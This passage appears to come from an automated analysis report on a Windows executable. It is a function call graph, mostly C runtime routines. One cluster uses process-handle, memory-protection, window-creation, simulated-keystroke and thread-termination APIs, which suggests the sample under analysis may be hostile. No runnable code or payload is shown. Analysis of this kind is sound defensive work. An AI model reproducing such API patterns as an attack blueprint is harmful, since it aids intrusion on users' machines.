6156->6157 6159 934c87 6156->6159 6158 9342fc __cftoe2_l 58 API calls 6157->6158 6164 934c9f 6158->6164 6159->6157 6162 934cc1 6159->6162 6160 93428d __cftoe2_l 9 API calls 6161 93278e 6160->6161 6161->6081 6161->6092 6162->6161 6163 9342fc __cftoe2_l 58 API calls 6162->6163 6163->6164 6164->6160 6166 934e4e ___crtIsPackagedApp 6165->6166 6167 934f0d IsDebuggerPresent 6166->6167 6168 934e5d LoadLibraryExW 6166->6168 6171 934f32 6167->6171 6172 934f17 6167->6172 6169 934e74 GetLastError 6168->6169 6170 934e9a GetProcAddress 6168->6170 6175 934e83 LoadLibraryExW 6169->6175 6178 934f2a 6169->6178 6176 934eae 7 API calls 6170->6176 6170->6178 6173 934f25 6171->6173 6174 934f37 DecodePointer 6171->6174 6172->6173 6177 934f1e OutputDebugStringW 6172->6177 6173->6178 6184 934f5e DecodePointer DecodePointer 6173->6184 6188 934f76 6173->6188 6174->6178 6175->6170 6175->6178 6179 934ef6 GetProcAddress EncodePointer 6176->6179 6180 934f0a 6176->6180 6177->6173 6181 93161c __setmbcp_nolock 6 API calls 6178->6181 6179->6180 6180->6167 6185 934ffc 6181->6185 6182 934f9a DecodePointer 6182->6178 6183 934fae DecodePointer 6183->6182 6186 934fb5 6183->6186 6184->6188 6185->6096 6186->6182 6189 934fc6 DecodePointer 6186->6189 6188->6182 6188->6183 6189->6182 6191 931626 IsProcessorFeaturePresent 6190->6191 6192 931624 6190->6192 6194 932c35 6191->6194 6192->6072 6197 932be4 IsDebuggerPresent 6194->6197 6198 932bf9 ___raise_securityfailure 6197->6198 6203 9333b8 SetUnhandledExceptionFilter UnhandledExceptionFilter 6198->6203 6200 932c01 ___raise_securityfailure 6204 9333a3 GetCurrentProcess TerminateProcess 6200->6204 6202 932c1e 6202->6072 6203->6200 6204->6202 6206 931d58 GetProcAddress 6205->6206 6207 931d6a ExitProcess 6205->6207 6206->6207 6209 9350c6 6208->6209 6217 935057 6208->6217 6210 9345f0 __calloc_impl DecodePointer 6209->6210 6211 9350cc 6210->6211 6212 9342fc __cftoe2_l 57 API calls 6211->6212 6215 9350be 6212->6215 6213 93261a __FF_MSGBANNER 57 API calls 6213->6217 6214 93508a HeapAlloc 6214->6215 6214->6217 6215->6102 6216 932677 __NMSG_WRITE 57 API calls 6216->6217 6217->6213 6217->6214 6217->6216 6218 9350b2 6217->6218 6219 931d73 _doexit 3 API calls 6217->6219 6220 9345f0 __calloc_impl DecodePointer 6217->6220 6222 9350b0 6217->6222 6221 9342fc __cftoe2_l 57 API calls 6218->6221 6219->6217 6220->6217 6221->6222 6223 9342fc __cftoe2_l 57 API calls 6222->6223 6223->6215 6224->6102 6225->6107 6226->6032 6227->6035 6231 933538 LeaveCriticalSection 6228->6231 6230 932308 6230->5855 6231->6230 6233 9339c8 6232->6233 6234 9339c1 6232->6234 6233->5891 6242 933d9d 6234->6242 6238 9323df 6236->6238 6241 932443 6238->6241 6652 934b7c 6238->6652 6239 932360 6239->5895 6239->5897 6240 934b7c _parse_cmdline 58 API calls 6240->6241 6241->6239 6241->6240 6243 933da9 __initptd 6242->6243 6267 931b72 6243->6267 6247 933dbb 6284 933a98 6247->6284 6250 9335cd __malloc_crt 58 API calls 6251 933ddd 6250->6251 6252 933f0a __initptd 6251->6252 6291 933f45 6251->6291 6252->6233 6255 933e13 6259 93354d _free 58 API calls 6255->6259 6261 933e33 6255->6261 6256 933f1a 6256->6252 6257 93354d _free 58 API calls 6256->6257 6260 933f2d 6256->6260 6257->6260 6258 9342fc __cftoe2_l 58 API calls 6258->6252 6259->6261 6260->6258 6261->6252 6262 9333ce __lock 58 API calls 6261->6262 6264 933e62 6262->6264 6263 933ef0 6301 933f0f 6263->6301 6264->6263 6266 93354d _free 58 API calls 6264->6266 6266->6263 6268 931b8a __getptd_noexit 58 API calls 6267->6268 6269 931b78 6268->6269 6270 931b85 6269->6270 6271 931d89 __lock 58 API calls 6269->6271 6272 933cf7 6270->6272 6271->6270 6273 933d03 __initptd 6272->6273 6274 931b72 __setmbcp 58 API calls 6273->6274 6275 933d0d 6274->6275 6276 9333ce __lock 58 API calls 6275->6276 6277 933d1f 6275->6277 6282 933d3d 6276->6282 6279 933d2d __initptd 6277->6279 6281 931d89 __lock 58 API calls 6277->6281 6278 933d6a 6304 933d94 6278->6304 6279->6247 6281->6279 6282->6278 6283 93354d _free 58 API calls 6282->6283 6283->6278 6308 9339d6 6284->6308 6287 933ab7 GetOEMCP 6289 933ae0 6287->6289 6288 933ac9 6288->6289 6290 933ace GetACP 6288->6290 6289->6250 6289->6252 6290->6289 6292 933a98 getSystemCP 60 API calls 6291->6292 6294 933f62 6292->6294 6293 933f69 setSBCS 6295 93161c __setmbcp_nolock 6 API calls 6293->6295 6294->6293 6297 933fb3 IsValidCodePage 6294->6297 6300 933fd8 _memset __setmbcp_nolock 6294->6300 6296 933e04 6295->6296 6296->6255 6296->6256 6297->6293 6298 933fc5 GetCPInfo 6297->6298 6298->6293 6298->6300 6585 933b65 GetCPInfo 6300->6585 6651 933538 LeaveCriticalSection 6301->6651 6303 933f16 6303->6252 6307 933538 LeaveCriticalSection 6304->6307 6306 933d9b 6306->6277 6307->6306 6309 9339e7 6308->6309 6313 933a34 6308->6313 6310 931b72 __setmbcp 58 API calls 6309->6310 6311 9339ed 6310->6311 6312 933a14 6311->6312 6316 9338ed 6311->6316 6312->6313 6315 933cf7 __setmbcp 58 API calls 6312->6315 6313->6287 6313->6288 6315->6313 6317 9338f9 __initptd 6316->6317 6318 931b72 __setmbcp 58 API calls 6317->6318 6319 933902 6318->6319 6320 933931 6319->6320 6321 933915 6319->6321 6322 9333ce __lock 58 API calls 6320->6322 6324 931b72 __setmbcp 58 API calls 6321->6324 6323 933938 6322->6323 6331 93396d 6323->6331 6326 93391a 6324->6326 6329 933928 __initptd 6326->6329 6330 931d89 __lock 58 API calls 6326->6330 6329->6312 6330->6329 6332 933978 ___addlocaleref ___removelocaleref 6331->6332 6334 93394c 6331->6334 6332->6334 6338 9336f3 6332->6338 6335 933964 6334->6335 6584 933538 LeaveCriticalSection 6335->6584 6337 93396b 6337->6326 6339 933708 6338->6339 6363 93376c 6338->6363 6342 933739 6339->6342 6349 93354d _free 58 API calls 6339->6349 6339->6363 6340 93354d _free 58 API calls 6343 93378d 6340->6343 6345 933757 6342->6345 6355 93354d _free 58 API calls 6342->6355 6346 93354d _free 58 API calls 6343->6346 6347 93354d _free 58 API calls 6345->6347 6351 9337a0 6346->6351 6352 933761 6347->6352 6348 93354d _free 58 API calls 6361 9337e2 6348->6361 6353 93372e 6349->6353 6350 933841 6354 93354d _free 58 API calls 6350->6354 6356 93354d _free 58 API calls 6351->6356 6357 93354d _free 58 API calls 6352->6357 6368 935202 6353->6368 6359 933847 6354->6359 6360 93374c 6355->6360 6362 9337ae 6356->6362 6357->6363 6359->6334 6396 9352fe 6360->6396 6361->6350 6365 93354d 58 API calls _free 6361->6365 6366 93354d _free 58 API calls 6362->6366 6363->6340 6367 9337b9 6363->6367 6365->6361 6366->6367 6367->6361 6408 935365 6367->6408 6369 935211 6368->6369 6395 9352fa 6368->6395 6370 935222 6369->6370 6371 93354d _free 58 API calls 6369->6371 6372 935234 6370->6372 6373 93354d _free 58 API calls 6370->6373 6371->6370 6374 935246 6372->6374 6376 93354d _free 58 API calls 6372->6376 6373->6372 6375 935258 6374->6375 6377 93354d _free 58 API calls 6374->6377 6378 93526a 6375->6378 6379 93354d _free 58 API calls 6375->6379 6376->6374 6377->6375 6380 93527c 6378->6380 6381 93354d _free 58 API calls 6378->6381 6379->6378 6382 93528e 6380->6382 6384 93354d _free 58 API calls 6380->6384 6381->6380 6383 9352a0 6382->6383 6385 93354d _free 58 API calls 6382->6385 6386 9352b2 6383->6386 6387 93354d _free 58 API calls 6383->6387 6384->6382 6385->6383 6388 93354d _free 58 API calls 6386->6388 6391 9352c4 6386->6391 6387->6386 6388->6391 6389 9352d6 6390 9352e8 6389->6390 6393 93354d _free 58 API calls 6389->6393 6394 93354d _free 58 API calls 6390->6394 6390->6395 6391->6389 6392 93354d _free 58 API calls 6391->6392 6392->6389 6393->6390 6394->6395 6395->6342 6397 935361 6396->6397 6398 935309 6396->6398 6397->6345 6399 935319 6398->6399 6400 93354d _free 58 API calls 6398->6400 6401 93532b 6399->6401 6403 93354d _free 58 API calls 6399->6403 6400->6399 6402 93533d 6401->6402 6404 93354d _free 58 API calls 6401->6404 6405 93534f 6402->6405 6406 93354d _free 58 API calls 6402->6406 6403->6401 6404->6402 6405->6397 6407 93354d _free 58 API calls 6405->6407 6406->6405 6407->6397 6409 9337d7 6408->6409 6410 935374 6408->6410 6409->6348 6411 93354d _free 58 API calls 6410->6411 6412 93537c 6411->6412 6413 93354d _free 58 API calls 6412->6413 6414 935384 6413->6414 6415 93354d _free 58 API calls 6414->6415 6416 93538c 6415->6416 6417 93354d _free 58 API calls 6416->6417 6418 935394 6417->6418 6419 93354d _free 58 API calls 6418->6419 6420 93539c 6419->6420 6421 93354d _free 58 API calls 6420->6421 6422 9353a4 6421->6422 6423 93354d _free 58 API calls 6422->6423 6424 9353ab 6423->6424 6425 93354d _free 58 API calls 6424->6425 6426 9353b3 6425->6426 6427 93354d _free 58 API calls 6426->6427 6428 9353bb 6427->6428 6429 93354d _free 58 API calls 6428->6429 6430 9353c3 6429->6430 6431 93354d _free 58 API calls 6430->6431 6432 9353cb 6431->6432 6433 93354d _free 58 API calls 6432->6433 6434 9353d3 6433->6434 6435 93354d _free 58 API calls 6434->6435 6436 9353db 6435->6436 6437 93354d _free 58 API calls 6436->6437 6438 9353e3 6437->6438 6439 93354d _free 58 API calls 6438->6439 6440 9353eb 6439->6440 6441 93354d _free 58 API calls 6440->6441 6442 9353f3 6441->6442 6443 93354d _free 58 API calls 6442->6443 6444 9353fe 6443->6444 6445 93354d _free 58 API calls 6444->6445 6446 935406 6445->6446 6447 93354d _free 58 API calls 6446->6447 6448 93540e 6447->6448 6449 93354d _free 58 API calls 6448->6449 6450 935416 6449->6450 6451 93354d _free 58 API calls 6450->6451 6452 93541e 6451->6452 6453 93354d _free 58 API calls 6452->6453 6454 935426 6453->6454 6455 93354d _free 58 API calls 6454->6455 6456 93542e 6455->6456 6457 93354d _free 58 API calls 6456->6457 6458 935436 6457->6458 6459 93354d _free 58 API calls 6458->6459 6460 93543e 6459->6460 6461 93354d _free 58 API calls 6460->6461 6462 935446 6461->6462 6463 93354d _free 58 API calls 6462->6463 6464 93544e 6463->6464 6465 93354d _free 58 API calls 6464->6465 6466 935456 6465->6466 6467 93354d _free 58 API calls 6466->6467 6468 93545e 6467->6468 6469 93354d _free 58 API calls 6468->6469 6470 935466 6469->6470 6471 93354d _free 58 API calls 6470->6471 6472 93546e 6471->6472 6473 93354d _free 58 API calls 6472->6473 6474 935476 6473->6474 6475 93354d _free 58 API calls 6474->6475 6476 935484 6475->6476 6477 93354d _free 58 API calls 6476->6477 6478 93548f 6477->6478 6479 93354d _free 58 API calls 6478->6479 6480 93549a 6479->6480 6481 93354d _free 58 API calls 6480->6481 6482 9354a5 6481->6482 6483 93354d _free 58 API calls 6482->6483 6484 9354b0 6483->6484 6485 93354d _free 58 API calls 6484->6485 6486 9354bb 6485->6486 6487 93354d _free 58 API calls 6486->6487 6488 9354c6 6487->6488 6489 93354d _free 58 API calls 6488->6489 6490 9354d1 6489->6490 6491 93354d _free 58 API calls 6490->6491 6492 9354dc 6491->6492 6493 93354d _free 58 API calls 6492->6493 6494 9354e7 6493->6494 6495 93354d _free 58 API calls 6494->6495 6496 9354f2 6495->6496 6497 93354d _free 58 API calls 6496->6497 6498 9354fd 6497->6498 6499 93354d _free 58 API calls 6498->6499 6500 935508 6499->6500 6501 93354d _free 58 API calls 6500->6501 6502 935513 6501->6502 6503 93354d _free 58 API calls 6502->6503 6504 93551e 6503->6504 6505 93354d _free 58 API calls 6504->6505 6506 935529 6505->6506 6507 93354d _free 58 API calls 6506->6507 6508 935537 6507->6508 6509 93354d _free 58 API calls 6508->6509 6510 935542 6509->6510 6511 93354d _free 58 API calls 6510->6511 6512 93554d 6511->6512 6513 93354d _free 58 API calls 6512->6513 6514 935558 6513->6514 6515 93354d _free 58 API calls 6514->6515 6516 935563 6515->6516 6517 93354d _free 58 API calls 6516->6517 6518 93556e 6517->6518 6519 93354d _free 58 API calls 6518->6519 6520 935579 6519->6520 6521 93354d _free 58 API calls 6520->6521 6522 935584 6521->6522 6523 93354d _free 58 API calls 6522->6523 6524 93558f 6523->6524 6525 93354d _free 58 API calls 6524->6525 6526 93559a 6525->6526 6527 93354d _free 58 API calls 6526->6527 6528 9355a5 6527->6528 6529 93354d _free 58 API calls 6528->6529 6530 9355b0 6529->6530 6531 93354d _free 58 API calls 6530->6531 6532 9355bb 6531->6532 6533 93354d _free 58 API calls 6532->6533 6534 9355c6 6533->6534 6535 93354d _free 58 API calls 6534->6535 6536 9355d1 6535->6536 6537 93354d _free 58 API calls 6536->6537 6538 9355dc 6537->6538 6539 93354d _free 58 API calls 6538->6539 6540 9355ea 6539->6540 6541 93354d _free 58 API calls 6540->6541 6542 9355f5 6541->6542 6543 93354d _free 58 API calls 6542->6543 6544 935600 6543->6544 6545 93354d _free 58 API calls 6544->6545 6546 93560b 6545->6546 6547 93354d _free 58 API calls 6546->6547 6548 935616 6547->6548 6549 93354d _free 58 API calls 6548->6549 6550 935621 6549->6550 6551 93354d _free 58 API calls 6550->6551 6552 93562c 6551->6552 6553 93354d _free 58 API calls 6552->6553 6554 935637 6553->6554 6555 93354d _free 58 API calls 6554->6555 6556 935642 6555->6556 6557 93354d _free 58 API calls 6556->6557 6558 93564d 6557->6558 6559 93354d _free 58 API calls 6558->6559 6560 935658 6559->6560 6561 93354d _free 58 API calls 6560->6561 6562 935663 6561->6562 6563 93354d _free 58 API calls 6562->6563 6564 93566e 6563->6564 6565 93354d _free 58 API calls 6564->6565 6566 935679 6565->6566 6567 93354d _free 58 API calls 6566->6567 6568 935684 6567->6568 6569 93354d _free 58 API calls 6568->6569 6570 93568f 6569->6570 6571 93354d _free 58 API calls 6570->6571 6572 93569d 6571->6572 6573 93354d _free 58 API calls 6572->6573 6574 9356a8 6573->6574 6575 93354d _free 58 API calls 6574->6575 6576 9356b3 6575->6576 6577 93354d _free 58 API calls 6576->6577 6578 9356be 6577->6578 6579 93354d _free 58 API calls 6578->6579 6580 9356c9 6579->6580 6581 93354d _free 58 API calls 6580->6581 6582 9356d4 6581->6582 6583 93354d _free 58 API calls 6582->6583 6583->6409 6584->6337 6590 933b9d 6585->6590 6594 933c47 6585->6594 6587 93161c __setmbcp_nolock 6 API calls 6589 933cf3 6587->6589 6589->6293 6595 935a45 6590->6595 6593 9358e9 ___crtLCMapStringA 62 API calls 6593->6594 6594->6587 6596 9339d6 _LocaleUpdate::_LocaleUpdate 58 API calls 6595->6596 6597 935a56 6596->6597 6605 93594d 6597->6605 6600 9358e9 6601 9339d6 _LocaleUpdate::_LocaleUpdate 58 API calls 6600->6601 6602 9358fa 6601->6602 6622 9356e5 6602->6622 6606 935967 6605->6606 6607 935974 MultiByteToWideChar 6605->6607 6606->6607 6610 9359a0 6607->6610 6617 935999 6607->6617 6608 93161c __setmbcp_nolock 6 API calls 6609 933bfe 6608->6609 6609->6600 6611 9359c2 _memset __alloca_probe_16 6610->6611 6612 93504b __crtLCMapStringA_stat 58 API calls 6610->6612 6613 9359fe MultiByteToWideChar 6611->6613 6611->6617 6612->6611 6614 935a28 6613->6614 6615 935a18 GetStringTypeW 6613->6615 6618 93592f 6614->6618 6615->6614 6617->6608 6619 93594a 6618->6619 6620 935939 6618->6620 6619->6617 6620->6619 6621 93354d _free 58 API calls 6620->6621 6621->6619 6624 9356fe MultiByteToWideChar 6622->6624 6625 93575d 6624->6625 6629 935764 6624->6629 6626 93161c __setmbcp_nolock 6 API calls 6625->6626 6627 933c1f 6626->6627 6627->6593 6628 9357c3 MultiByteToWideChar 6630 9357dc 6628->6630 6646 93582a 6628->6646 6631 93504b __crtLCMapStringA_stat 58 API calls 6629->6631 6634 93578c __alloca_probe_16 6629->6634 6647 935bd2 6630->6647 6631->6634 6633 93592f __freea 58 API calls 6633->6625 6634->6625 6634->6628 6635 9357f0 6636 935806 6635->6636 6638 935832 6635->6638 6635->6646 6637 935bd2 __crtLCMapStringA_stat LCMapStringW 6636->6637 6636->6646 6637->6646 6640 93585a __alloca_probe_16 6638->6640 6641 93504b __crtLCMapStringA_stat 58 API calls 6638->6641 6639 935bd2 __crtLCMapStringA_stat LCMapStringW 6643 93589d 6639->6643 6640->6639 6640->6646 6641->6640 6642 9358c5 6644 93592f __freea 58 API calls 6642->6644 6643->6642 6645 9358b7 WideCharToMultiByte 6643->6645 6644->6646 6645->6642 6646->6633 6648 935be2 6647->6648 6649 935bfd __crtLCMapStringA_stat 6647->6649 6648->6635 6650 935c14 LCMapStringW 6649->6650 6650->6635 6651->6303 6655 934b22 6652->6655 6656 9339d6 _LocaleUpdate::_LocaleUpdate 58 API calls 6655->6656 6657 934b34 6656->6657 6657->6238 6661 931efe 6658->6661 6660 931da4 6662 931f0a __initptd 6661->6662 6663 9333ce __lock 51 API calls 6662->6663 6664 931f11 6663->6664 6665 931f3f DecodePointer 6664->6665 6668 931fca __cinit 6664->6668 6667 931f56 DecodePointer 6665->6667 6665->6668 6674 931f66 6667->6674 6681 932018 6668->6681 6670 932027 __initptd 6670->6660 6672 931f73 EncodePointer 6672->6674 6673 93200f 6675 931d73 _doexit 3 API calls 6673->6675 6674->6668 6674->6672 6676 931f83 DecodePointer EncodePointer 6674->6676 6677 932018 6675->6677 6679 931f95 DecodePointer DecodePointer 6676->6679 6678 932025 6677->6678 6686 933538 LeaveCriticalSection 6677->6686 6678->6660 6679->6674 6682 931ff8 6681->6682 6683 93201e 6681->6683 6682->6670 6685 933538 LeaveCriticalSection 6682->6685 6687 933538 LeaveCriticalSection 6683->6687 6685->6673 6686->6678 6687->6682 6689 934bab 6688->6689 6690 934b9d 6688->6690 6691 9342fc __cftoe2_l 58 API calls 6689->6691 6690->6689 6693 934bc1 6690->6693 6696 934bb2 6691->6696 6692 93428d __cftoe2_l 9 API calls 6694 934bbc 6692->6694 6693->6694 6695 9342fc __cftoe2_l 58 API calls 6693->6695 6694->5919 6695->6696 6696->6692 6698 9345d4 EncodePointer 6697->6698 6698->6698 6699 9345ee 6698->6699 6699->5926 6703 9344c0 6700->6703 6702 9345c7 6702->5928 6704 9344cc __initptd 6703->6704 6711 931eeb 6704->6711 6710 9344f3 __initptd 6710->6702 6712 9333ce __lock 58 API calls 6711->6712 6713 931ef2 6712->6713 6714 934504 DecodePointer DecodePointer 6713->6714 6715 9344e1 6714->6715 6716 934531 6714->6716 6725 9344fe 6715->6725 6716->6715 6728 935b20 6716->6728 6718 934594 EncodePointer EncodePointer 6718->6715 6719 934543 6719->6718 6720 934568 6719->6720 6735 933614 6719->6735 6720->6715 6722 933614 __realloc_crt 61 API calls 6720->6722 6724 934582 EncodePointer 6720->6724 6723 93457c 6722->6723 6723->6715 6723->6724 6724->6718 6762 931ef4 6725->6762 6729 935b29 6728->6729 6730 935b3e HeapSize 6728->6730 6731 9342fc __cftoe2_l 58 API calls 6729->6731 6730->6719 6732 935b2e 6731->6732 6733 93428d __cftoe2_l 9 API calls 6732->6733 6734 935b39 6733->6734 6734->6719 6739 93361b 6735->6739 6737 933658 6737->6720 6739->6737 6740 9350dd 6739->6740 6761 933395 Sleep 6739->6761 6741 9350f1 6740->6741 6742 9350e6 6740->6742 6744 9350f9 6741->6744 6752 935106 6741->6752 6743 93504b __crtLCMapStringA_stat 58 API calls 6742->6743 6745 9350ee 6743->6745 6746 93354d _free 58 API calls 6744->6746 6745->6739 6758 935101 __dosmaperr 6746->6758 6747 93513e 6749 9345f0 __calloc_impl DecodePointer 6747->6749 6748 93510e HeapReAlloc 6748->6752 6748->6758 6750 935144 6749->6750 6753 9342fc __cftoe2_l 58 API calls 6750->6753 6751 93516e 6755 9342fc __cftoe2_l 58 API calls 6751->6755 6752->6747 6752->6748 6752->6751 6754 9345f0 __calloc_impl DecodePointer 6752->6754 6757 935156 6752->6757 6753->6758 6754->6752 6756 935173 GetLastError 6755->6756 6756->6758 6759 9342fc __cftoe2_l 58 API calls 6757->6759 6758->6739 6760 93515b GetLastError 6759->6760 6760->6758 6761->6739 6765 933538 LeaveCriticalSection 6762->6765 6764 931efb 6764->6710 6765->6764 6767 931374 GetLastError 6766->6767 6768 9313d3 6766->6768 6767->6768 6769 93137f CharUpperBuffW 6767->6769 6770 93161c __setmbcp_nolock 6 API calls 6768->6770 6769->6768 6771 931391 6769->6771 6772 9313f1 OpenProcess GetLastError 6770->6772 6771->6768 6773 9313a6 GetCurrentProcess IsWow64Process 6771->6773 6772->5932 6772->5933 6774 9313d5 GetCurrentProcessId 6773->6774 6775 9313be 6773->6775 6809 93ba30 Sleep GetModuleHandleA LoadLibraryA 6774->6809 6775->6774 6777 9313c7 GetCurrentProcessId 6775->6777 6787 93ca30 Sleep GetModuleHandleA LoadLibraryA 6777->6787 6780 93124f 6779->6780 6781 9312b6 6780->6781 6782 931266 VirtualProtect 6780->6782 6889 93d9b8 6781->6889 6782->6781 6786 931286 VirtualProtect 6782->6786 6786->6781 6788 93ca7a 6787->6788 6789 93ca8e GetVersionExW 6787->6789 6790 93161c __setmbcp_nolock 6 API calls 6788->6790 6791 93cc21 RegisterClassExW 6789->6791 6792 93cab5 6789->6792 6794 93ca88 6790->6794 6791->6788 6793 93cc93 GetSystemMetrics GetSystemMetrics CreateThread 6791->6793 6795 93cadf GetModuleHandleA 6792->6795 6799 93cac7 6792->6799 6796 93cd21 6793->6796 6797 93ccc7 6793->6797 6794->6768 6798 93cb56 IsWow64Process 6795->6798 6795->6799 6801 93161c __setmbcp_nolock 6 API calls 6796->6801 6800 93ccfa TerminateThread Sleep keybd_event keybd_event 6797->6800 6804 93ccec Sleep 6797->6804 6798->6788 6802 93cb6d 6798->6802 6799->6788 6799->6798 6800->6796 6803 93cd33 6801->6803 6802->6788 6835 93cfd0 CreateWindowExW 6802->6835 6803->6768 6804->6797 6804->6800 6806 93cbcd 6845 93cd40 RegisterClassExW 6806->6845 6808 93cbd7 6808->6788 6808->6791 6810 93ba7a 6809->6810 6811 93ba8e GetVersionExW 6809->6811 6812 93161c __setmbcp_nolock 6 API calls 6810->6812 6813 93bab5 6811->6813 6814 93bc59 RegisterClassExW 6811->6814 6815 93ba88 6812->6815 6817 93bae4 GetModuleHandleA 6813->6817 6825 93bac7 6813->6825 6814->6810 6816 93bccb GetSystemMetrics GetSystemMetrics CreateThread 6814->6816 6815->6768 6818 93bd60 6816->6818 6822 93bcff 6816->6822 6819 93bb5b IsWow64Process 6817->6819 6817->6825 6823 93161c __setmbcp_nolock 6 API calls 6818->6823 6819->6810 6820 93bb72 6819->6820 6820->6810 6865 93bf60 CreateWindowExW 6820->6865 6821 93bd39 TerminateThread Sleep keybd_event keybd_event 6821->6818 6822->6821 6828 93bd2b Sleep 6822->6828 6824 93bd72 6823->6824 6824->6768 6825->6810 6825->6819 6827 93bbc8 6875 93bd80 RegisterClassExW 6827->6875 6828->6821 6828->6822 6830 93bbd2 6830->6810 6831 93bbf5 GetModuleHandleA 6830->6831 6832 93bc09 6830->6832 6831->6832 6833 93bc00 6831->6833 6832->6833 6834 93bc12 GetModuleHandleA 6832->6834 6833->6814 6834->6833 6836 93cff5 6835->6836 6837 93d03c 6835->6837 6859 93c750 6836->6859 6837->6806 6840 93d002 SetWindowLongW 6842 93d010 6840->6842 6841 93d034 DestroyWindow 6841->6837 6843 93d031 6842->6843 6844 93d022 DestroyWindow 6842->6844 6843->6841 6844->6806 6846 93cda1 6845->6846 6847 93cda8 CreateWindowExW 6845->6847 6846->6808 6848 93ce95 6847->6848 6849 93cddb RegisterClassExW 6847->6849 6848->6808 6849->6848 6850 93cdf8 CreateWindowExW 6849->6850 6850->6848 6851 93ce1f 6850->6851 6852 93c750 2 API calls 6851->6852 6853 93ce25 6852->6853 6854 93c750 2 API calls 6853->6854 6855 93ce2d 6854->6855 6855->6848 6856 93ce7f DestroyWindow DestroyWindow 6855->6856 6857 93ce75 6855->6857 6858 93ce5f DestroyWindow DestroyWindow 6855->6858 6856->6808 6857->6856 6858->6808 6860 93c761 6859->6860 6861 93c75c 6859->6861 6860->6840 6860->6841 6863 93c790 LoadLibraryA GetProcAddress 6861->6863 6864 93c7b0 6863->6864 6864->6860 6866 93bf85 6865->6866 6867 93bfcc 6865->6867 6868 93c750 2 API calls 6866->6868 6867->6827 6869 93bf8c 6868->6869 6870 93bf92 SetWindowLongW 6869->6870 6871 93bfc4 DestroyWindow 6869->6871 6872 93bfa0 6870->6872 6871->6867 6873 93bfc1 6872->6873 6874 93bfb2 DestroyWindow 6872->6874 6873->6871 6874->6827 6876 93bde1 6875->6876 6877 93bde8 CreateWindowExW 6875->6877 6876->6830 6878 93bed5 6877->6878 6879 93be1b RegisterClassExW 6877->6879 6878->6830 6879->6878 6880 93be38 CreateWindowExW 6879->6880 6880->6878 6881 93be5f 6880->6881 6882 93c750 2 API calls 6881->6882 6883 93be65 6882->6883 6884 93c750 2 API calls 6883->6884 6885 93be6d 6884->6885 6885->6878 6886 93bebf DestroyWindow DestroyWindow 6885->6886 6887 93beb5 6885->6887 6888 93be9f DestroyWindow DestroyWindow 6885->6888 6886->6830 6887->6886 6888->6830 6890 93161c __setmbcp_nolock 6 API calls 6889->6890 6891 93d9c2 6890->6891 6891->6891 7114 937b14 7115 937b1c __cfltcvt_init 7114->7115 7116 937b27 7115->7116 7118 9398ba 7115->7118 7124 93a73f 7118->7124 7120 9398cd 7121 9398d4 7120->7121 7122 93429d __invoke_watson 8 API calls 7120->7122 7121->7116 7123 9398e0 7122->7123 7125 93a77b __control87 7124->7125 7127 93a75b __control87 7124->7127 7125->7120 7126 9342fc __cftoe2_l 58 API calls 7128 93a771 7126->7128 7127->7126 7129 93428d __cftoe2_l 9 API calls 7128->7129 7129->7125 7130 939799 7133 9397b1 7130->7133 7134 9397c2 7133->7134 7135 9397db 7133->7135 7139 937a39 7134->7139 7148 937ac7 7135->7148 7138 9397ac 7140 9339d6 _LocaleUpdate::_LocaleUpdate 58 API calls 7139->7140 7141 937a5d 7140->7141 7151 938674 7141->7151 7146 93161c __setmbcp_nolock 6 API calls 7147 937ac3 7146->7147 7147->7138 7163 937995 7148->7163 7152 9386bc 7151->7152 7158 9386cc ___mtold12 7151->7158 7153 9342fc __cftoe2_l 58 API calls 7152->7153 7154 9386c1 7153->7154 7155 93428d __cftoe2_l 9 API calls 7154->7155 7155->7158 7156 93161c __setmbcp_nolock 6 API calls 7157 937a75 7156->7157 7159 937b90 7157->7159 7158->7156 7162 937be8 7159->7162 7160 93161c __setmbcp_nolock 6 API calls 7161 937a82 7160->7161 7161->7146 7162->7160 7164 9339d6 _LocaleUpdate::_LocaleUpdate 58 API calls 7163->7164 7165 9379c2 7164->7165 7166 938674 ___strgtold12_l 58 API calls 7165->7166 7167 9379da 7166->7167 7172 938102 7167->7172 7170 93161c __setmbcp_nolock 6 API calls 7171 937a35 7170->7171 7171->7138 7175 93815a 7172->7175 7173 93161c __setmbcp_nolock 6 API calls 7174 9379f7 7173->7174 7174->7170 7175->7173 7176 938e1c 7179 938e3d 7176->7179 7178 938e38 7180 938ea7 7179->7180 7181 938e48 7179->7181 7247 93938e 7180->7247 7181->7180 7183 938e4d 7181->7183 7185 938e52 7183->7185 7186 938e6b 7183->7186 7184 938e8c 7184->7178 7193 939548 7185->7193 7188 938e8e 7186->7188 7190 938e75 7186->7190 7234 938ec3 7188->7234 7212 939609 7190->7212 7264 93a5af 7193->7264 7196 93958d 7199 9395a5 7196->7199 7200 939595 7196->7200 7197 93957d 7198 9342fc __cftoe2_l 58 API calls 7197->7198 7201 939582 7198->7201 7276 93a437 7199->7276 7202 9342fc __cftoe2_l 58 API calls 7200->7202 7204 93428d __cftoe2_l 9 API calls 7201->7204 7205 93959a 7202->7205 7208 939589 7204->7208 7207 93428d __cftoe2_l 9 API calls 7205->7207 7206 9395d8 7206->7208 7285 93945c 7206->7285 7207->7208 7210 93161c __setmbcp_nolock 6 API calls 7208->7210 7211 938e66 7210->7211 7211->7178 7213 93a5af __fltout2 58 API calls 7212->7213 7214 939637 7213->7214 7215 939651 7214->7215 7216 93963e 7214->7216 7218 939659 7215->7218 7219 93966c 7215->7219 7217 9342fc __cftoe2_l 58 API calls 7216->7217 7220 939643 7217->7220 7221 9342fc __cftoe2_l 58 API calls 7218->7221 7222 93a437 __fptostr 58 API calls 7219->7222 7223 93428d __cftoe2_l 9 API calls 7220->7223 7224 93965e 7221->7224 7225 939698 7222->7225 7226 93964a 7223->7226 7227 93428d __cftoe2_l 9 API calls 7224->7227 7225->7226 7229 9396de 7225->7229 7232 9396b8 7225->7232 7228 93161c __setmbcp_nolock 6 API calls 7226->7228 7227->7226 7230 939704 7228->7230 7305 93923d 7229->7305 7230->7184 7233 93945c __cftof2_l 58 API calls 7232->7233 7233->7226 7235 9339d6 _LocaleUpdate::_LocaleUpdate 58 API calls 7234->7235 7236 938ee8 7235->7236 7237 938eff 7236->7237 7238 938f08 7236->7238 7239 9342fc __cftoe2_l 58 API calls 7237->7239 7241 938f11 7238->7241 7244 938f25 7238->7244 7240 938f04 7239->7240 7243 93428d __cftoe2_l 9 API calls 7240->7243 7242 9342fc __cftoe2_l 58 API calls 7241->7242 7242->7240 7246 938f20 _memset __alldvrm __cftoa_l _strrchr 7243->7246 7244->7246 7337 93921f 7244->7337 7246->7184 7248 93a5af __fltout2 58 API calls 7247->7248 7249 9393c0 7248->7249 7250 9393d7 7249->7250 7251 